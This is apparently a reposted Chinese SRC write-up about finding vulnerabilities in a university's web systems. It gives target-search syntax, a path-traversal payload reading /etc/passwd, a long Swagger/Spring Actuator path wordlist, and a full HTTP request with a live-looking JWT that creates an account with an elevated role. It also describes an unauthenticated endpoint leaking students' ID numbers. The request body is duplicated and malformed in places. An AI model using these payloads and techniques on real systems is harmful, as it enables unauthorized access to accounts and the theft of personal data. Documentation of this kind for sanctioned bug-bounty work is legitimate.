记录一次某高校漏洞挖掘
最近在空闲时间想着挖一个证书玩玩,于是在edusrc礼品中心选择了某高校
确定站点
鹰图语法
icp.name="某高校" && (body="注册" && body="登录")
在各种信息收集,鹰图上发现一个注册站点
未授权访问
随意注册一个账户,首先对该站点登录页面进行寻找突破口
F12发现一个json接口,里面存在大量路由
将这些路由路径在登录页面进行遍历直接未授权访问一枚
敏感信息泄露
如果挖一个洞就收工显然是没有什么价值的,接着在bp历史包中发现一个userinfo接口
> 此id发现此接口泄露了身份证,经过测试此id并未鉴权,通过userid可以遍历全校的敏感信息,又是一枚敏感信息泄露
任意文件读取
在漏洞一收集到的路由中,找到了一处材料接口,查看历史数据发现有一个fullFileName参数
构造payload,生成出了文件
../../etc/passwd
查看pdf文件又获得一枚任意文件读取
端口扫描/未授权访问
通过goby扫描,发现还有一处8098端口,访问显示code:404
进行目录遍历,这里使用的swagger的字典
复制/swagger
/api-docs
/api.html
/swagger-ui
/swagger/codes
/api/index.html
/api/v2/api-docs
/v2/swagger.json
/swagger-ui/html
/distv2/index.html
/swagger/index.html
/sw/swagger-ui.html
/api/swagger-ui.html
/static/swagger.json
/user/swagger-ui.html
/swagger-ui/index.html
/swagger-dubbo/api-docs
/template/swagger-ui.html
/swagger/static/index.html
/dubbo-provider/distv2/index.html
/spring-security-rest/api/swagger-ui.html
/spring-security-oauth-resource/swagger-ui.html
/v2/api-docs
/swagger-ui.html
/mappings
/metrics
/beans
/configprops
/actuator/metrics
/actuator/mappings
/actuator/beans
/actuator/configprops
/actuator
/auditevents
/autoconfig
/beans
/caches
/conditions
/configprops
/docs
/dump
/env
/flyway
/health
/heapdump
/httptrace
/info
/intergrationgraph
/jolokia
/logfile
/loggers
/liquibase
/metrics
/mappings
/prometheus
/refresh
/scheduledtasks
/sessions
/shutdown
/trace
/threaddump
/actuator/auditevents
/actuator/beans
/actuator/health
/actuator/conditions
/actuator/configprops
/actuator/env
/actuator/info
/v2/api-docs
/swagger-ui.html
/swagger
/api/swagger
/Swagger/ui/index
/api/swaggerui
/swagger/ui
/api/swagger/ui
/api/swagger-ui.html
/user/swagger-ui.html
/libs/swaggerui
/swagger/index.html
/swagger-resources/configuration/ui
/swagger-resources/configuration/security
/api.html
/druid/index.html
/sw/swagger-ui.html
/api/swagger-ui.html
/template/swagger-ui.html
/spring-security-rest/api/swagger-ui.html
/spring-security-oauth-resource/swagger-ui.html
/swagger/v1/swagger.json
/swagger/v2/swagger.json
/api-docs
/api/doc
/docs/
/doc.html
/v1/api-docs
/v3/api-docs
/actuator/loggers
/actuator/heapdump
/actuator/threaddump
/actuator/metrics
/actuator/scheduledtasks
/actuator/httptrace
/actuator/mappings
/actuator/jolokia
/actuator/hystrix.stream
成功找到了此处路由
对于这些接口测试发现这里的token值并未鉴权,只会鉴别token是否存在,于是在一个接口里面直接创建了一个账户
复制payload
POST /api/user/v1/createUser HTTP/1.1
Host: XXXXX:8098
Content-Length: 1028
accept: */*
DNT: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: application/json
Origin: XXXXX:8098
Referer: XXXXX:8098/swagger-ui/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en,zh;q=0.5
Connection: close
token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJIaXRlY2hAQXV0aCIsImV4cCI6MTY3OTY1Njk0NSwiaWF0IjoxNjc4NzkyOTQ1LCJIaXRlY2hAVXNlciI6IntcInRva2VuSWRcIjpcIjY5MWExZjk5NzU5ODQyZDQ4NjNhMTE3NjRkYTUyN2ZkXCIsXCJ0b2tlblR5cGVcIjpcImxvZ2luXCIsXCJicm93c2VySW5mb1wiOm51bGwsXCJ1aWRcIjoxNDUsXCJ1c2VySWRcIjpcIjIwMjMzMTRcIixcInVzZXJUeXBlXCI6bnVsbCxcInJlZ2lzdGVyVHlwZVwiOm51bGwsXCJwYXNzd29yZFwiOlwiYjQ1Y2ZmZTA4NGRkM2QyMGQ5MjhiZWU4NWU3YjBmMjFcIixcInVzZXJOYW1lXCI6XCJzdHJpbmdcIn0ifQ.VpljTWGWXKq0sOX6Euj_2dki1i0uRQme4Kb_D5wVysg
{
"birthDate": "string",
"classId": "string",
"code": "string",
"collegeId": "string",
"configPassword": "2023314",
"dutyType": 0,
"email": "string",
"endDate": "string",
"highestEducation": "string",
"id": 0,
"idNumber": "string",
"lastlogin": "string",
"logincnt": 0,
"majorId": "string",
"mobile": "1888888888",
"nation": "string",
"nativePlace": "string",
"page": {
"endRow": 0,
"list": {},
"pageIndex": 0,
"pageSize": 0,
"pages": 0,
"startRow": 0,
"total": 0
},
"paramFlag": "string",
"password": "2023314",
"passwordchangecnt": 0,
"phone": "1888888888",
"positionTitle": "string",
"qq": "string",XDD
"regFlag": 0,
"registerType": "string",
"schoolId": "string",
"sex": 0,
"startDate": "string",
"userId": "123123123",
"userName": "edusrc1",
"userOrganizeList": [
"string"
],
"userRoleList": [
1
],
"userType": "string",
"validflag": 0,
"webPath": "string",
"workDepartment": "string",
> "birthDate": "string",
"classId": "string",
"code": "string",
"collegeId": "string",
"configPassword": "2023314",
"dutyType": 0,
"email": "string",
"endDate": "string",
"highestEducation": "string",
"id": 0,
"idNumber": "string",
"lastlogin": "string",
"logincnt": 0,
"majorId": "string",
"mobile": "1888888888",
"nation": "string",
"nativePlace": "string",
"page": {
"endRow": 0,
"list": {},
"pageIndex": 0,
"pageSize": 0,
"pages": 0,
"startRow": 0,
"total": 0
},
"paramFlag": "string",
"password": "2023314",
"passwordchangecnt": 0,
"phone": "1888888888",
"positionTitle": "string",
"qq": "string",XDD
"regFlag": 0,
"registerType": "string",
"schoolId": "string",
"sex": 0,
"startDate": "string",
"userId": "123123123",
"userName": "edusrc1",
"userOrganizeList": [
"string"
],
"userRoleList": [
1
],
"userType": "string",
"validflag": 0,
"webPath": "string",
"workDepartment": "string",
"workUnit":"string" "workUnit":"string"
}
总结
漏洞挖掘一定要慢慢来,当你想出多一步思路时,就已经超越了许多的人
原文始发于微信公众号(奉天安全团队):记录一次某高校漏洞挖掘-文末抽奖
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论